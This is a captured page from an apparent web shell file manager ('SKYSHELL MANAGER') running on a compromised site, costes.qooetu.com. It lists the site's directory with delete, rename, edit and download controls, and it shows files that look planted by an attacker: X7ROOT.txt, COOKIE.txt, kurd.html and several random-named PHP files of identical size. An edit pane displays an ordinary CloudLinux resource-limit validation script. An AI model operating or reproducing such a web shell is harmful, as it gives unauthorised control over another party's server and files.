📁
SKYSHELL MANAGER
PHP v8.2.30
Create
Create
Path:
root
/
home
/
qooetu
/
costes.qooetu.com
/
Name
Size
Perm
Actions
📁
.well-known
-
0755
🗑️
🏷️
🔒
📁
2e19d9
-
0755
🗑️
🏷️
🔒
📁
6b114
-
0755
🗑️
🏷️
🔒
📁
Modules
-
0755
🗑️
🏷️
🔒
📁
app
-
0755
🗑️
🏷️
🔒
📁
assets
-
0755
🗑️
🏷️
🔒
📁
bootstrap
-
0755
🗑️
🏷️
🔒
📁
cgi-bin
-
0755
🗑️
🏷️
🔒
📁
config
-
0755
🗑️
🏷️
🔒
📁
css
-
0755
🗑️
🏷️
🔒
📁
database
-
0755
🗑️
🏷️
🔒
📁
images
-
0755
🗑️
🏷️
🔒
📁
js
-
0755
🗑️
🏷️
🔒
📁
nbproject
-
0755
🗑️
🏷️
🔒
📁
public
-
0755
🗑️
🏷️
🔒
📁
resources
-
0755
🗑️
🏷️
🔒
📁
routes
-
0755
🗑️
🏷️
🔒
📁
storage
-
0755
🗑️
🏷️
🔒
📁
tests
-
0755
🗑️
🏷️
🔒
📁
uploads
-
0755
🗑️
🏷️
🔒
📁
vendor
-
0755
🗑️
🏷️
🔒
📁
wp-admin
-
0755
🗑️
🏷️
🔒
📁
wp-content
-
0755
🗑️
🏷️
🔒
📁
wp-includes
-
0755
🗑️
🏷️
🔒
📄
.htaccess
0.23 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
COOKIE.txt
0.2 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
X7ROOT.txt
0.27 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
defaults.php
1.29 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
engine.php
0 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
error_log
813.08 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
features.php
11.28 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
googlecfb82e09419fc0f6.html
0.05 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
index.php0
1.56 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
inputs.php
0.12 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
kurd.html
1.07 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
library.php
0 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
min.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
p.php
2.75 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
php.ini
0.04 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
product.php
1.78 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
qpmwztts.php
0.74 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
robots.txt
0.32 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
tovmbkwh.php
0.74 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
tyyffovi.php
0.74 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
veoxv.html
1.23 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
Edit: lve_ext_scritps.js
/** * Copyright © Cloud Linux GmbH & Cloud Linux Software, Inc 2010-2019 All Rights Reserved * * Licensed under CLOUD LINUX LICENSE AGREEMENT * http://cloudlinux.com/docs/LICENSE.TXT */ (function(w){ function validateInt(data, min, max) { var int_patt = /^[0-9]+$/, value; if (data.replace(/\s/g, "").localeCompare('DEFAULT') == 0){ return true; } if (data.replace(/\s/g, "").localeCompare('') == 0){ return true; } if (!int_patt.test(data)) { return false; } value = Number(data); if ((value < min ) || (value > max)) { return false; } return true; } function validateMem(data, min, max) { var match_array = data.match(/^(?:\d*\.)?\d+([kgmt])?$/i), value; if (data.replace(/\s/g, "").localeCompare('DEFAULT') == 0){ return true; } if (data.replace(/\s/g, "").localeCompare('') == 0){ return true; } if (match_array === null) { return false; } value = Number(match_array[1]); if ((value < min ) || (value > max)) { return false; } return true; } function printMessage(key) { switch(key) { case 'cpu': return translateDict['Must be in range 1 - 100 if used old format; use % or mhz|ghz to set cpu limit as speed.'] + "\n"; case 'pmem': case 'mem': return translateDict['Memory must be positive. Postfix allowed only in (KGMT).'] + "\n"; default: return translateDict['Must be positive.'] + "\n"; } } function validateCpu(value) { var cpu_pattern = /\d{1,2}0?$/, // 1-100 speed_percent_pattern = /\d+(?:\.\d+)?%$/, // *% speed_hz_pattern = /\d+(?:\.\d+)?(mhz|ghz)+$/i; // *mhz\ghz if (value.replace(/\s/g, "").localeCompare('DEFAULT') == 0){ return true; } if (value.replace(/\s/g, "").localeCompare('') == 0){ return true; } match_array = value.match(cpu_pattern); if (match_array != null) { if (validateInt(value,1,100)) { return true; } else { return false; } } match_array = value.match(speed_percent_pattern); if (match_array != null) { return true; } match_array = value.match(speed_hz_pattern); if (match_array != null) { return true; } return false; } function validateMemory(value) { return validateMem(value,0,Number.MAX_VALUE); } function validateOther(value) { return validateInt(value,0,Number.MAX_VALUE); } var d = w.document, main = d.getElementById("main"), dispatcher = { "cpu":validateCpu, "pmem":validateMemory, "mem":validateMemory, "ep":validateOther, "nproc":validateOther, "io":validateOther, "iops":validateOther }; main.onchange = function(e){ var tgt = e.target, prefix = 'lve_', input_id = tgt.getAttribute("id"); if (tgt.tagName === 'INPUT' && tgt.getAttribute("class") === "lve") { if (input_id.indexOf(prefix) != -1) { var key = input_id.substring(prefix.length); if (!dispatcher[key](tgt.value)) { alert(key+' => ' + tgt.value + '. ' + translateDict['Incorrect limits'] + '. ' + printMessage(key)); tgt.value = ''; } } } }; }(window));
Save